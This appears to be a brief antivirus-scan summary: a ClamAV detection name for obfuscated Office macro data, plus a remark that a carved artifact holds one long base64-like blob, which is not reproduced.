ClamAV: Doc.Macro.ObfuscatedData-6136276-0
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).